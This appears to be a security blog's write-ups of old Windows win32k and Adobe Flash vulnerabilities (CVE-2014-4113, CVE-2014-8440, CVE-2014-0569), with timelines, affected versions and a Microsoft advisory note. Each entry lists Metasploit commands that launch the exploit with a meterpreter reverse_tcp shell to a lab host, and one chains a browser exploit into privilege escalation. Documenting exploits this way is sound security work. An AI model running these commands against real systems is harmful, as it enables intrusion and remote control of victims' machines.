CVE-2014-4113 Windows TrackPopupMenu Win32k NULL Pointer Dereference

Timeline :

Vulnerability discovered exploited in the wild
Patched by the vendor via MS14-058 the 2014–10-14
Metasploit PoC provided the 2014–10-24

PoC provided by :

Unknown
juan vazquez
Spencer McIntyre
OJ Reeves

Reference(s) :

CVE-2014-4113
BID-70364
MS14-058

Affected version(s) :

Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8 and Windows 8.1
Windows Server 2012 and Windows Server 2012 R2
Windows RT and Windows RT 8.1

Tested on :

on Windows 7 SP1 in combination with CVE-2014-8440 (Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory) vulnerability

Description :

This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

use exploit/windows/local/ms14_058_track_popup_menu
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
set LPORT 4445
set SESSION 1
run

getuid
sysinfo

CVE-2014-8440 Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory

Timeline :

Vulnerability discovered by bilou and reported to Verisign’s iDefense VCP
Vulnerability reported to the vendor by Verisign’s iDefense VCP the 2014-09-03
Patched by the vendor via APSB14-24 the 2014–11-11
Vulnerability reported integrated into exploit kits the 2014-11-20
Metasploit PoC provided the 2015–04-30

PoC provided by :

Nicolas Joly (bilou ?)
Unknown
juan vazquez

Reference(s) :

CVE-2014-8440
APSB14-24

Affected version(s) :

Adobe Flash Player 15.0.0.189 and earlier versions
Adobe Flash Player 13.0.0.250 and earlier 13.x versions
Adobe Flash Player 11.2.202.411 and earlier versions for Linux
Adobe AIR desktop runtime 15.0.0.293 and earlier versions
Adobe AIR SDK 15.0.0.302 and earlier versions
Adobe AIR SDK & Compiler 15.0.0.302 and earlier versions
Adobe AIR 15.0.0.293 and earlier versions for Android

Tested on :

with Adobe Flash Player 15.0.0.189 and Internet Explorer 11 on Windows 7 SP1

Description :

This module exploits an unintialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 15.0.0.189.

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

MSA-2755801 Microsoft Emergency Patch For Flash Player 0day

Microsoft has release, December 29th 2015, an emergency patch, with the updated of one security advisory concerning Adobe Flash Player.

Microsoft Security Advisory 2755801

MSA-2755801,released during September 2012, has been updated. The security advisory is concerning updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10, Internet Explorer 11 and Microsoft Edge. KB3132372 has been released for supported editions of for:

  • Internet Explorer 10 on Windows 8, Windows Server 2012, and Windows RT;
  • Internet Explorer 11 on Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, and Windows 10;
  • Microsoft Edge on Windows 10.

The update addresses the vulnerabilities and Adobe Flash Player 0day (CVE-2015-8651described in Adobe Security bulletin APSB16-01.

Application of KB3132372 could lead to limited application crashes on Windows 10.

CVE-2014-0569 Adobe Flash Player casi32 Integer Overflow

Timeline :

Vulnerability discovered by bilou and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2014-09-10
Patched by the vendor via APSB14-22 the 2014–10-14
Vulnerability reported integrated into exploit kits the 2014-10-21
Metasploit PoC provided the 2015–04-10

PoC provided by :

bilou
juan vazquez

Reference(s) :

CVE-2014-0569
APSB14-22
ZDI-14-365

Affected version(s) :

Adobe Flash Player 15.0.0.167 and earlier versions

Tested on :

with Adobe Flash Player 15.0.0.167 and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as domainMemory for the current application domain. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.

Commands :

use exploit/windows/browser/adobe_flash_casi32_int_overflow
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo